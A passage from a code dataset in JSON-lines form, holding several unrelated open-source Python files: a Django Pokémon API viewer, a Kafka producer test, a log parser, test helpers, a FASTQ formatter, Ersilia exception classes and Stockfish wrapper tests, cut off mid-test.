ValueError(\"Missing an argument for filter_text\")\n return filter_text\n\n def subscribe(self, update: Update):\n self.subscribers.append(update.effective_user.id)\n\n def toggle(self):\n self.active = not self.active\n\n def __repr__(self) -> str:\n if not self.active:\n return \"\"\n return f\"(filter_id) {self.id} : {self.text}\\n\"","repo_name":"belbcode/telegram-filter-bot","sub_path":"src/Utils/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20654826877","text":"# coding=utf-8\nimport requests\nfrom django.shortcuts import render, redirect\n#LISTAR\n\ndef listar_pokemon(request):\n url = 'https://pokeapi.co/api/v2/pokemon/?limit=9'\n offset = 0\n next = 1\n previus = -1\n\n if 'next' in request.GET:\n previus = int(request.GET.get('next'))-1\n next = int (request.GET.get('next'))+1\n offset = int(request.GET.get('next'))*9\n\n if 'previus' in request.GET:\n previus = int(request.GET.get('previus'))-1\n offset = int(request.GET.get('previus'))*9\n\n args = {'offset':offset} if offset else {}\n response = requests.get(url, params=args)\n if response.status_code == 200:\n payload = response.json()\n result = payload.get('results', [])\n if result:\n pokemonS = []\n for pokemon in result:\n nombre = pokemon['name']\n response = requests.get(pokemon['url'])\n if response.status_code == 200:\n payload = response.json()\n pokemon_id = payload.get('id', [])\n img = payload.get('sprites', [])\n imagen = img['other']\n dir = {'nombre': nombre, 'id': pokemon_id, 'imagen': imagen}\n pokemonS.append(dir)\n return render(request, 'templates/listar_pokemon.html', {'pokemonS':pokemonS, 'next':next, 'previus':previus})\n\ndef tipo(request, id_tipo):\n id = id_tipo\n url = 'https://pokeapi.co/api/v2/type/'+str(id)\n response = requests.get(url)\n if response.status_code == 200:\n payload = response.json()\n pokemon_id = payload.get('id', [])\n pokemon_name = payload.get('pokemon', [])\n tipo_name = payload.get('name')\n pokemonS = []\n for pokemon in pokemon_name:\n links = pokemon['pokemon']\n response = requests.get(links['url'])\n if response.status_code == 200:\n payload = response.json()\n pokemon_id = payload.get('id', [])\n nombre = payload.get('name', [])\n img = payload.get('sprites', [])\n imagen = img['other']\n dir = {'id': pokemon_id, 'imagen': imagen, 'nombre':nombre}\n pokemonS.append(dir)\n return render(request, 'templates/base/pokemon_tipo.html', 
{'pokemonS':pokemonS, 'tipo_name':tipo_name})\n\n\ndef getInfoPokemon(request, id_pokemon):\n id = id_pokemon\n url = 'https://pokeapi.co/api/v2/pokemon/'+str(id)\n response = requests.get(url)\n if response.status_code == 200:\n payload = response.json()\n nombre = payload.get('name', [])\n img = payload.get('sprites', [])\n imagen = img['other']\n peso = payload.get('weight', [])\n altura = payload.get('height', [])\n habilidad = payload.get('abilities', [])\n tipo = payload.get('types', [])\n movimiento = payload.get('moves', [])\n\n if tipo:\n pokemonS = []\n for pokemon in tipo:\n pokemonUrl = pokemon['type']\n response = requests.get(pokemonUrl['url'])\n if response.status_code == 200:\n payload = response.json()\n id_tipo = payload.get('id', [])\n nombre_tipo = payload.get('name', [])\n dir = {'id':id_tipo, 'nombre':nombre_tipo}\n pokemonS.append(dir)\n\n diccionario = {'nombre':nombre, 'imagen':imagen, 'peso':peso, 'altura':altura}\n\n return render(request, 'templates/pokemon_info.html', {'pokemon':diccionario, 'habilidad':habilidad, 'tipo':tipo, 'movimiento':movimiento, 'pokemonUrl':id_tipo, 'pokemonS':pokemonS})\n\ndef tiposPokemon(request):\n url = 'https://pokeapi.co/api/v2/type/'\n response = requests.get(url)\n if response.status_code == 200:\n payload = response.json()\n result = payload.get('results', [])\n if result:\n pokemonS = []\n for pokemon in result:\n nombre = pokemon['name']\n response = requests.get(pokemon['url'])\n if response.status_code == 200:\n payload = response.json()\n id = payload.get('id', [])\n tipo = pokemon.get('name', [])\n dir = {'tipo': tipo, 'id':id}\n pokemonS.append(dir)\n\n return render(request, 'templates/select_tipo.html', {'id':id, 'pokemonS':pokemonS})","repo_name":"danielh-wh/pokemon-api","sub_path":"app/pokemones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21601712260","text":"import datetime\n\nfrom confluent_kafka import Consumer, KafkaException, KafkaError\nfrom confluent_kafka import Producer\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer, AvroSerializer\nfrom confluent_kafka.serialization import StringSerializer, SerializationContext, MessageField\n\nfrom Module.Authentication import Authentication, auth_to_dict, dct_to_auth\nfrom pymongo import MongoClient\nfrom SendEmail import send_email\nimport random\nimport sys\nimport json\n\n# Define Topics and Config\ntopic_user_authentication_result = 'upwork_user_authentication_result'\nbootstrap_servers = 'localhost:39092,localhost:39093,localhost:39094'\nsr_config = {\n 'url': 'http://localhost:8282'\n}\n\n# Define Kafka Deserializer and Schema\nschema_registry_client = SchemaRegistryClient(sr_config)\nauth_schema = schema_registry_client.get_latest_version(\"upwork_user_auth\")\nauth_avro_serializer = AvroSerializer(schema_registry_client,\n auth_schema.schema.schema_str,\n auth_to_dict)\n\n\ndef define_kafka_producer():\n kraft_config = {\n 'bootstrap.servers': bootstrap_servers,\n }\n producer = Producer(kraft_config)\n return producer\n\n\ndef delivery_report(err, event):\n if err is not None:\n print(f\"Error ID: {event.key().decode('utf8')}: {err}\")\n else:\n print(f\"Success: {event.key().decode('utf8')}\")\n\n\ndef send_producer(topic, key_value, object_data, producer, avro_serializer):\n producer.produce(topic=topic,\n 
key=StringSerializer('utf_8')(key_value),\n value=avro_serializer(object_data, SerializationContext(topic, MessageField.VALUE)),\n on_delivery=delivery_report)\n producer.flush()\n\n\ni = 0\nwhile i <= 5:\n i = i + 1\n dateFormat = '%Y%m%d'\n timeFormat = '%H%M%S'\n current_date = datetime.datetime.now().strftime(dateFormat)\n current_time = datetime.datetime.now().strftime(timeFormat)\n producer = define_kafka_producer()\n new_auth_otp = Authentication(\"Test123\", \"Test@mail.com\", current_date, current_time, \"\", \"statusss\")\n send_producer(topic_user_authentication_result, \"Test123\", new_auth_otp, producer, auth_avro_serializer)\n","repo_name":"dmitrimahayana/Data-Engineering","sub_path":"Py-Kafka-SASL/Test2.py","file_name":"Test2.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3262631877","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport argparse\nimport sys, os\n\nif __name__ == \"__main__\":\n\n d = \"\"\"\"\"\"\n parser = argparse.ArgumentParser(description=d)\n parser.add_argument(\"-fn\", type=str, nargs=\"+\",\n help=\"Input. The log files from TF.\")\n parser.add_argument(\"-patience\", default=40, type=int,\n help=\"Input. The patience for early stopping.\")\n parser.add_argument(\"-epochs\", type=int, default=200,\n help=\"Input. The number of epochs in training. \")\n parser.add_argument(\"-filters\", type=str, default=\"128+64+32\")\n args = parser.parse_args()\n\n EPOCHS = args.epochs\n p = args.patience + 1\n\n fn_list = args.fn\n for i, fn in enumerate(fn_list):\n if i == 0 :\n print(\"Pooling Batch Dropout Alpha filters Loss(T) RMSE(T) PCC(T) Loss(V) RMSE(V) PCC(V)\")\n\n if not os.path.exists(fn):\n print(\"TF log file %s not exists. \"%fn)\n #sys.exit(0)\n else:\n df = pd.read_csv(fn, header=0, index_col=0)\n\n batch = fn.split(\"batch\")[1].split(\"_\")[0]\n dropout = fn.split(\"dropout\")[1].split(\"_\")[0]\n alpha = fn.split(\"alpha\")[1][:3]\n if \"with\" in fn:\n pooling = \"yes\"\n else:\n pooling = \"no\"\n\n if df.index.values[-1] == EPOCHS or df.shape[0] < args.patience + 1:\n print(fn, \"Model training per-terminated before a final solution fixed. 
\")\n #sys.exit(0)\n else:\n to_print = \"%24s, %6s, %6s, %6s, %6s, %12s,\" % (fn, pooling, batch, dropout, alpha, args.filters)\n #dat = df.iloc[-1*patience, :]\n to_print += \"%8.4f,%8.4f,%8.4f,%8.4f,%8.4f, %8.4f\" %(df['loss'].values[-p], df['rmse_train'].values[-p], df['pcc_train'].values[-p],\n df['loss_val'].values[-p], df['rmse_val'].values[-p], df['pcc_val'].values[-p])\n\n print(to_print)\n\n","repo_name":"zhenglz/deepunion","sub_path":"deepunion/test/getDNNresults.py","file_name":"getDNNresults.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"10316785818","text":"\"\"\" Python file related to Pop Up Message in UI \"\"\"\nfrom PageObjectLibrary import PageObject\nfrom robot.api.deco import keyword\nfrom resources.Common import Common\n\n\nclass PopUpMsg(PageObject):\n \"\"\" Functions related to Pop Up Message in UI \"\"\"\n\n @keyword(\"validate pop up message shows '${msg}'\")\n def validate_pop_up_msg(self, msg):\n \"\"\" Functions to validate pop up message returned \"\"\"\n self.selib.wait_until_page_does_not_contain_element(\"//div[@class='loading-text']//img\")\n try:\n self.selib.wait_until_element_is_visible('//core-notification-message//div[@class=\"popup-message\"]')\n msg_return = self.selib.get_text('//core-notification-message//div[@class=\"popup-message\"]')\n except Exception as e:\n print(e.__class__, \"occured\")\n self.selib.wait_until_element_is_visible('//core-notification-confirm//div[@class=\"ant-modal-confirm-body\"]')\n msg_return = self.selib.get_text('//core-notification-confirm//div[@class=\"ant-modal-confirm-body\"]')\n\n self.builtin.should_contain(msg_return, msg)\n\n def validate_pop_up_message(self, msg):\n self.selib.wait_until_element_is_visible('//nz-message-container//child::span')\n msg_return = self.selib.get_text('//nz-message-container//child::span')\n self.builtin.should_contain(msg_return, msg)\n\n @keyword(\"confirm pop up message\")\n def click_button_on_pop_up_msg(self):\n \"\"\" Functions to click Ok button on pop up shown \"\"\"\n Common().wait_keyword_success(\"click_element\", \"//core-notification-message//button\")\n\n def insert_into_field_in_pop_up(self, label, item):\n \"\"\" Functions to insert text in inline search pop up \"\"\"\n self.selib.input_text(\"//*[contains(text(),'{0}')]/following::input[1]\".format(label), item)\n\n def insert_into_field_in_filter_pop_up(self, label, item):\n \"\"\" Functions to insert text in filter pop up \"\"\"\n self.selib.input_text(\"//core-search-panel//*[contains(text(),'{0}')]/following::input[1]\".format(label), item)\n","repo_name":"ronnyling/rckl-llt.github.io","sub_path":"Lelongtips/sherlock-dms/resources/components/PopUpMsg.py","file_name":"PopUpMsg.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40381715915","text":"\"\"\"\nFASTQ formatter\n\"\"\"\nclass FASTQFormatter(object):\n \"\"\"Formatter for FASTQ files\"\"\"\n def __init__(self, theme):\n \"\"\"Creates a new FASTQFormatter instance\"\"\"\n import os\n from cats.styles.sequence import SequenceFormatter\n\n # Load sequence formatter\n self.seq_formatter = SequenceFormatter(theme)\n\n def format(self, inbuffer, outbuffer=None, **kwargs):\n \"\"\"Format sequence records\"\"\"\n import sys\n\n # default/bold text\n RESET = '\\033[0m'\n BOLD = '\\033[1m'\n\n # default to STDOUT for output\n if outbuffer is None:\n 
outbuffer = sys.stdout\n\n # FASTQ line types\n FASTQ_ID = 0\n FASTQ_SEQ = 1\n FASTQ_DESC = 2\n FASTQ_QUAL = 3\n\n # Iterate through and format each sequence record\n if kwargs['color']:\n for i, line in enumerate(inbuffer):\n # Reset formatting\n outbuffer.write(RESET)\n\n # line = line.decode('ascii')\n line = line.decode()\n\n # Print description\n if i % 4 == FASTQ_ID:\n outbuffer.write(BOLD + line)\n elif i % 4 == FASTQ_SEQ:\n outbuffer.write(self.seq_formatter.format_nucleic_acid(line,\n kwargs['stop_codons'],\n kwargs['cpg']))\n else:\n outbuffer.write(line)\n else:\n for line in inbuffer:\n outbuffer.write(line.decode())\n\nclass UnrecognizedInput(IOError):\n \"\"\"Unrecognized input error\"\"\"\n pass\n","repo_name":"khughitt/cats","sub_path":"cats/formatters/fastq.py","file_name":"fastq.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"37424338149","text":"from ... import ErsiliaBase\nimport os\nimport tempfile\nfrom ...utils.terminal import run_command\n\n\nclass ErsiliaError(Exception):\n \"\"\"Base class for managing errors in Ersilia\"\"\"\n\n def __init__(\n self, message=\"Ersilia has experienced an error\", hints=\"\", config_json=None\n ):\n text = \"Ersilia exception class:\\n\"\n text += \"{}\\n\\n\".format(type(self).__name__)\n text += \"Detailed error:\\n\"\n text += message\n text += \"\\n\\n\"\n if hints:\n text += \"Hints:\\n\"\n text += hints\n text += \"\\n\"\n eb = ErsiliaBase(config_json=config_json, credentials_json=None)\n eb.logger.error(text)\n Exception.__init__(self, text)\n\n\nclass MissingDependencyError(ErsiliaError):\n def __init__(self, dependency):\n self.dependency = dependency\n self.message = \"Missing dependency {0}\".format(self.dependency)\n self.hints = \"\"\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass NullModelIdentifierError(ErsiliaError):\n def __init__(self, model):\n self.model = model\n self.message = \"Model identifier {0} is null\".format(self.model)\n self.hints = \"This type of error typically occurs when a model has not been served. Please run 'ersilia serve MODEL_ID' if you have a model identifier in mind\"\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass InvalidModelIdentifierError(ErsiliaError):\n def __init__(self, model):\n self.model = model\n self.message = \"Could not identify model identifier or slug: {0}:\".format(\n self.model\n )\n self.hints = \"Please check that {0} exists in the Ersilia Model Hub:\\n - https://ersilia.io/model-hub (for approved models)\\n - https://airtable.com/shrUcrUnd7jB9ChZV (for approved and in preparation models)\".format(\n self.model\n )\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass ModelNotAvailableLocallyError(ErsiliaError):\n def __init__(self, model):\n self.model = model\n self.message = (\n \"Model {0} is not available locally, so it cannot be served\".format(\n self.model\n )\n )\n self.hints = \"Fetch the model using the CLI. 
Simply run:\\n\"\n self.hints += \"$ ersilia fetch {0}\".format(self.model)\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass EmptyOutputError(ErsiliaError):\n def __init__(self, model_id, api_name):\n self.model_id = model_id\n self.api_name = api_name\n self.message = \"Model API {0}:{1} did not produce an output\".format(\n self.model_id, self.api_name\n )\n log = self.run_from_terminal()\n self.message += log\n self.hints = \"- Visit the fetch troubleshooting site\"\n ErsiliaError.__init__(self, self.message, self.hints)\n\n def run_from_terminal(self):\n eb = ErsiliaBase()\n bundle_dir = eb._get_bundle_location(model_id=self.model_id)\n framework_dir = os.path.join(\n bundle_dir, self.model_id, \"artifacts\", \"framework\"\n )\n bash_executables = [\"run.sh\", \"run_predict.sh\", \"run_calculate.sh\"]\n for exec_file in os.listdir(framework_dir):\n if exec_file in bash_executables:\n break\n exec_file = os.path.join(framework_dir, exec_file)\n input_file = os.path.join(framework_dir, \"example_input.csv\")\n output_file = os.path.join(framework_dir, \"example_output.csv\")\n tmp_folder = tempfile.mkdtemp(prefix=\"ersilia-\")\n log_file = os.path.join(tmp_folder, \"terminal.log\")\n run_command(\"ersilia example {0} -n 3 -f {1}\".format(self.model_id, input_file))\n cmd = \"bash {0} {1} {2} {3} 2>&1 | tee -a {4}\".format(\n exec_file, framework_dir, input_file, output_file, log_file\n )\n run_command(cmd)\n with open(log_file, \"r\") as f:\n log = f.read()\n return log\n","repo_name":"ersilia-os/ersilia","sub_path":"ersilia/utils/exceptions_utils/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"40711916104","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.sparse.linalg import spsolve\n\nfrom fealpy.pde.poisson_2d import CosCosData\n\nfrom fealpy.functionspace import LagrangeFiniteElementSpace\n\nfrom fealpy.boundarycondition import DirichletBC\n\n\npde = CosCosData()\n\nmesh = pde.init_mesh(n=5, meshtype='tri')\n\nspace = LagrangeFiniteElementSpace(mesh, p=1)\n\nuh = space.function() # (NN, )\n\nA = space.stiff_matrix()\nF = space.source_vector(pde.source)\n\nbc = DirichletBC(space, pde.dirichlet)\n\nA, F = bc.apply(A, F, uh)\n\nuh[:] = spsolve(A, F)\n\nL2error = space.integralalg.error(pde.solution, uh) # L_2 error\nH1error = space.integralalg.error(pde.gradient, uh.grad_value)\n\nprint(L2error)\nprint(H1error)\n\n\nuh.add_plot(plt, cmap='rainbow')\nplt.show()\n\n\n","repo_name":"weihuayi/fealpy","sub_path":"tutorial/step_2.py","file_name":"step_2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"15230552168","text":"\"\"\"Tests for DynaliteDevices.\"\"\"\n\nimport pytest\n\nimport dynalite_devices_lib.const as dyn_const\nfrom dynalite_devices_lib.dynet import DynetPacket\nfrom dynalite_devices_lib.opcodes import OpcodeType\n\nfrom .common import packet_notification, preset_notification\n\n\ndef preset_select_func(area, preset):\n \"\"\"Create preset selection packet.\"\"\"\n return DynetPacket.select_area_preset_packet(area, preset, 0)\n\n\ndef linear_func(area, preset):\n \"\"\"Create preset linear fade packet.\"\"\"\n return DynetPacket(\n area=area, command=OpcodeType.LINEAR_PRESET.value, data=[preset - 1, 0, 0]\n )\n\n\ndef report_func(area, preset):\n \"\"\"Create preset report 
packet.\"\"\"\n return DynetPacket.report_area_preset_packet(area, preset)\n\n\ndef set_channel_func(area, channel):\n \"\"\"Create channel set level packet.\"\"\"\n return DynetPacket.set_channel_level_packet(area, channel, 1, 0)\n\n\ndef report_channel_func(area, channel):\n \"\"\"Create channel report level packet.\"\"\"\n return DynetPacket.report_channel_level_packet(area, channel, 1, 1)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"conf, packet_func\",\n [\n (dyn_const.CONF_PRESET, preset_select_func),\n (dyn_const.CONF_PRESET, linear_func),\n (dyn_const.CONF_PRESET, report_func),\n (dyn_const.CONF_CHANNEL, set_channel_func),\n (dyn_const.CONF_CHANNEL, report_channel_func),\n ],\n)\nasync def test_selections(mock_gateway, conf, packet_func):\n \"\"\"Run preset / channel selection tests with various commands.\"\"\"\n devices = mock_gateway.configure_dyn_dev(\n {\n dyn_const.CONF_ACTIVE: False,\n dyn_const.CONF_AREA: {\"2\": {conf: {i: {} for i in range(1, 9)}}},\n dyn_const.CONF_PRESET: {},\n },\n 8,\n )\n for device in devices:\n assert not device.is_on\n assert await mock_gateway.async_setup_dyn_dev()\n await mock_gateway.check_single_update(None)\n for i in range(1, 9):\n packet = packet_func(2, i)\n await mock_gateway.receive(packet)\n exp_notifications = [packet_notification(packet.raw_msg)]\n if conf == dyn_const.CONF_CHANNEL:\n await mock_gateway.check_single_update(devices[i - 1])\n assert devices[i - 1].is_on\n else: # CONF_PRESET\n await mock_gateway.check_updates(devices)\n for j in range(1, 9):\n assert devices[j - 1].is_on == (i == j)\n exp_notifications.append(preset_notification(2, i))\n await mock_gateway.check_notifications(exp_notifications)\n\n\n@pytest.mark.asyncio\nasync def test_inbound_request_channel_level(mock_gateway):\n \"\"\"Test when the network requests a channel level. 
Nothing to do, just be sure nothing bad happens...\"\"\"\n [device] = mock_gateway.configure_dyn_dev(\n {\n dyn_const.CONF_ACTIVE: False,\n dyn_const.CONF_AREA: {\"3\": {dyn_const.CONF_CHANNEL: {\"5\": {}}}},\n dyn_const.CONF_PRESET: {},\n },\n 1,\n )\n assert not device.is_on\n assert await mock_gateway.async_setup_dyn_dev()\n await mock_gateway.check_single_update(None)\n packet = DynetPacket.request_channel_level_packet(3, 5)\n await mock_gateway.receive(packet)\n await mock_gateway.check_notifications([packet_notification(packet.raw_msg)])\n assert not device.is_on\n","repo_name":"ziv1234/python-dynalite-devices","sub_path":"tests/test_inbound.py","file_name":"test_inbound.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28361868031","text":"import pytest\nfrom timeit import default_timer\nimport time\n\nfrom stockfish import Stockfish, StockfishException\n\n\nclass TestStockfish:\n @pytest.fixture\n def stockfish(self):\n return Stockfish()\n\n def test_get_best_move_first_move(self, stockfish):\n best_move = stockfish.get_best_move()\n assert best_move in (\n \"e2e3\",\n \"e2e4\",\n \"g1f3\",\n \"b1c3\",\n \"d2d4\",\n )\n\n def test_get_best_move_time_first_move(self, stockfish):\n best_move = stockfish.get_best_move_time(1000)\n assert best_move in (\"e2e3\", \"e2e4\", \"g1f3\", \"b1c3\", \"d2d4\")\n\n def test_get_best_move_remaining_time_first_move(self, stockfish):\n best_move = stockfish.get_best_move(wtime=1000)\n assert best_move in (\"a2a3\", \"d2d4\", \"e2e4\", \"g1f3\", \"c2c4\")\n best_move = stockfish.get_best_move(btime=1000)\n assert best_move in (\"g1f3\", \"d2d4\", \"e2e4\", \"c2c4\")\n best_move = stockfish.get_best_move(wtime=1000, btime=1000)\n assert best_move in (\"g2g3\", \"g1f3\", \"e2e4\", \"d2d4\", \"c2c4\", \"e2e3\")\n best_move = stockfish.get_best_move(wtime=5 * 60 * 1000, btime=1000)\n assert best_move in (\"e2e3\", \"e2e4\", \"g1f3\", \"b1c3\", \"d2d4\")\n\n def test_set_position_resets_info(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n stockfish.get_best_move()\n assert stockfish.info != \"\"\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n assert stockfish.info == \"\"\n\n def test_get_best_move_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n best_move = stockfish.get_best_move()\n assert best_move in (\"d2d4\", \"g1f3\")\n\n def test_get_best_move_time_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n best_move = stockfish.get_best_move_time(1000)\n assert best_move in (\"d2d4\", \"g1f3\")\n\n def test_get_best_move_remaining_time_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n best_move = stockfish.get_best_move(wtime=1000)\n assert best_move in (\"d2d4\", \"a2a3\", \"d1e2\", \"b1c3\")\n best_move = stockfish.get_best_move(btime=1000)\n assert best_move in (\"d2d4\", \"b1c3\")\n best_move = stockfish.get_best_move(wtime=1000, btime=1000)\n assert best_move in (\"d2d4\", \"b1c3\", \"g1f3\")\n best_move = stockfish.get_best_move(wtime=5 * 60 * 1000, btime=1000)\n assert best_move in (\"e2e3\", \"e2e4\", \"g1f3\", \"b1c3\", \"d2d4\")\n\n def test_get_best_move_checkmate(self, stockfish):\n stockfish.set_position([\"f2f3\", \"e7e5\", \"g2g4\", \"d8h4\"])\n assert stockfish.get_best_move() is None\n\n def test_get_best_move_time_checkmate(self, stockfish):\n stockfish.set_position([\"f2f3\", \"e7e5\", \"g2g4\", \"d8h4\"])\n assert 
stockfish.get_best_move_time(1000) is None\n\n def test_get_best_move_remaining_time_checkmate(self, stockfish):\n stockfish.set_position([\"f2f3\", \"e7e5\", \"g2g4\", \"d8h4\"])\n assert stockfish.get_best_move(wtime=1000) is None\n assert stockfish.get_best_move(btime=1000) is None\n assert stockfish.get_best_move(wtime=1000, btime=1000) is None\n assert stockfish.get_best_move(wtime=5 * 60 * 1000, btime=1000) is None\n\n def test_set_fen_position(self, stockfish):\n stockfish.set_fen_position(\n \"7r/1pr1kppb/2n1p2p/2NpP2P/5PP1/1P6/P6K/R1R2B2 w - - 1 27\"\n )\n assert stockfish.is_move_correct(\"f4f5\") is True\n assert stockfish.is_move_correct(\"a1c1\") is False\n\n def test_castling(self, stockfish):\n assert stockfish.is_move_correct(\"e1g1\") is False\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp3pp/3ppp2/8/4P3/5N2/PPPPBPPP/RNBQK2R w KQkq - 0 4\"\n )\n assert stockfish.is_move_correct(\"e1g1\") is True\n\n def test_set_fen_position_mate(self, stockfish):\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/8/r3K3 w - - 12 53\")\n assert stockfish.get_best_move() is None\n assert stockfish.info == \"info depth 0 score mate 0\"\n\n def test_clear_info_after_set_new_fen_position(self, stockfish):\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/r7/4K3 b - - 11 52\")\n stockfish.get_best_move()\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/8/r3K3 w - - 12 53\")\n assert stockfish.info == \"\"\n\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/r7/4K3 b - - 11 52\")\n stockfish.get_best_move()\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/8/r3K3 w - - 12 53\", False)\n assert stockfish.info == \"\"\n\n def test_set_fen_position_starts_new_game(self, stockfish):\n stockfish.set_fen_position(\n \"7r/1pr1kppb/2n1p2p/2NpP2P/5PP1/1P6/P6K/R1R2B2 w - - 1 27\"\n )\n stockfish.get_best_move()\n assert stockfish.info != \"\"\n stockfish.set_fen_position(\"3kn3/p5rp/1p3p2/3B4/3P1P2/2P5/1P3K2/8 w - - 0 53\")\n assert stockfish.info == \"\"\n\n def test_set_fen_position_second_argument(self, stockfish):\n stockfish.set_depth(16)\n stockfish.set_fen_position(\n \"rnbqk2r/pppp1ppp/3bpn2/8/3PP3/2N5/PPP2PPP/R1BQKBNR w KQkq - 0 1\", True\n )\n assert stockfish.get_best_move() == \"e4e5\"\n\n stockfish.set_fen_position(\n \"rnbqk2r/pppp1ppp/3bpn2/4P3/3P4/2N5/PPP2PPP/R1BQKBNR b KQkq - 0 1\", False\n )\n assert stockfish.get_best_move() == \"d6e7\"\n\n stockfish.set_fen_position(\n \"rnbqk2r/pppp1ppp/3bpn2/8/3PP3/2N5/PPP2PPP/R1BQKBNR w KQkq - 0 1\", False\n )\n assert stockfish.get_best_move() == \"e4e5\"\n\n def test_is_move_correct_first_move(self, stockfish):\n assert stockfish.is_move_correct(\"e2e1\") is False\n assert stockfish.is_move_correct(\"a2a3\") is True\n\n def test_is_move_correct_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n assert stockfish.is_move_correct(\"e2e1\") is False\n assert stockfish.is_move_correct(\"a2a3\") is True\n\n @pytest.mark.parametrize(\n \"value\",\n [\n \"info\",\n \"depth\",\n \"seldepth\",\n \"multipv\",\n \"score\",\n \"mate\",\n \"-1\",\n \"nodes\",\n \"nps\",\n \"tbhits\",\n \"time\",\n \"pv\",\n \"h2g1\",\n \"h4g3\",\n ],\n )\n def test_last_info(self, stockfish, value):\n stockfish.set_fen_position(\"r6k/6b1/2b1Q3/p6p/1p5q/3P2PP/5r1K/8 w - - 1 31\")\n stockfish.get_best_move()\n assert value in stockfish.info\n\n def test_set_skill_level(self, stockfish):\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp2ppp/3pp3/8/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 0 1\"\n )\n\n assert stockfish.get_parameters()[\"Skill Level\"] == 20\n\n 
stockfish.set_skill_level(1)\n assert stockfish.get_best_move() in (\n \"b2b3\",\n \"d2d3\",\n \"d2d4\",\n \"b1c3\",\n \"d1e2\",\n \"g2g3\",\n \"c2c4\",\n \"f1e2\",\n \"c2c3\",\n \"h2h3\",\n )\n assert stockfish.get_parameters()[\"Skill Level\"] == 1\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n\n stockfish.set_skill_level(20)\n assert stockfish.get_best_move() in (\"d2d4\", \"c2c4\")\n assert stockfish.get_parameters()[\"Skill Level\"] == 20\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n\n def test_set_elo_rating(self, stockfish):\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp2ppp/3pp3/8/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 0 1\"\n )\n\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 1350\n\n stockfish.set_elo_rating(2000)\n assert stockfish.get_best_move() in (\n \"d2d4\",\n \"b1c3\",\n \"d1e2\",\n \"c2c4\",\n \"f1e2\",\n \"h2h3\",\n \"c2c3\",\n \"f1d3\",\n \"a2a3\",\n )\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 2000\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"true\"\n\n stockfish.set_elo_rating(1350)\n assert stockfish.get_best_move() in (\n \"d1e2\",\n \"b1c3\",\n \"d2d3\",\n \"d2d4\",\n \"c2c4\",\n \"f1e2\",\n \"c2c3\",\n \"f1b5\",\n \"g2g3\",\n \"h2h3\",\n )\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 1350\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"true\"\n\n stockfish.set_elo_rating(2850)\n major_version = stockfish.get_stockfish_major_version()\n\n expected_best_moves = [\"d2d4\", \"b1c3\", \"c2c3\", \"c2c4\", \"f1b5\", \"f1e2\"]\n if major_version >= 12 and not stockfish.is_development_build_of_engine():\n expected_best_moves.remove(\"f1e2\")\n\n assert stockfish.get_best_move() in expected_best_moves\n\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 2850\n\n def test_specific_params(self, stockfish):\n old_parameters = {\n \"Debug Log File\": \"\",\n \"Contempt\": 0,\n \"Min Split Depth\": 0,\n \"Threads\": 1,\n \"Ponder\": \"false\",\n \"Hash\": 16,\n \"MultiPV\": 1,\n \"Skill Level\": 20,\n \"Move Overhead\": 10,\n \"Minimum Thinking Time\": 20,\n \"Slow Mover\": 100,\n \"UCI_Chess960\": \"false\",\n \"UCI_LimitStrength\": \"false\",\n \"UCI_Elo\": 1350,\n }\n expected_parameters = old_parameters.copy()\n stockfish.set_skill_level(1)\n expected_parameters[\"Skill Level\"] = 1\n assert 